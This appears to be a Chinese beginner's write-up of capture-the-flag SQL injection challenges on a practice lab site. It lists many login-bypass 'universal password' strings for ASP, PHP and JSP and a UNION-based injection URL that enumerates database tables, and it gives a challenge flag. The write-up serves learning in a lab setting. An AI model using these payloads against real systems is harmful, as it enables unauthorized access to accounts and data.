作为一个刷题的小白,相信有很多和我一样的小白,我就在这记录自己的刷题吧,一步步来,希望对大家有帮助
第一题
F12 查看源码
发现登录的是admin 尝试一下万能密码 怎么使用万能密码呢,刚刷提的小白也许不懂吧,反正我不懂 下面介绍几个万能密码
(1)直接登录框 输入admin’# 密码的话就随便填几个就行 无所谓的 验证码正确就可以 username = admin’ or ‘’=’
第二种 假如不知道是admin登录的话 直接账号输入万能用户名 密码随便一样可以
asp aspx万能密码
1: "or “a”="a
2: ')or(‘a’=‘a
3:or 1=1–
4:‘or 1=1–
5:a’or’ 1=1–
6: "or 1=1–
7:‘or’a’=‘a
8: “or”="a’=‘a
9:‘or’’=’
10:‘or’=‘or’
11: 1 or ‘1’=‘1’=1
12: 1 or ‘1’=‘1’ or 1=1
13: 'OR 1=1%00
14: "or 1=1%00
15: 'xor
PHP万能密码
‘or’=‘or’
'or 1=1/* 字符型 GPC是否开都可以使用
User: something
Pass: ’ OR ‘1’='1
jsp 万能密码
1’or’1’=‘1
admin’ OR 1=1/*
第二题:
F12审查元素
构造url:view-source:http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php/?id=1
开始了注入模式 ’出现错误 说明存在注入点
判断字段数
判断数据库名字
判断表名:http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php/?id=1%20union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=%27mydbs%27–+
flag: HKGGflagdfs56757fsdv
第三题:
御剑扫描了一下后台
好 啥也没发现 抓个包把那就
没发现什么,也是没有思路 只能曲看大佬的了
根据响应头中返回的 charset=gb2312 ,猜测可能是一个宽字节注入,通过验证后开始正常的注入流程 开始学习宽字节注入 一会继续发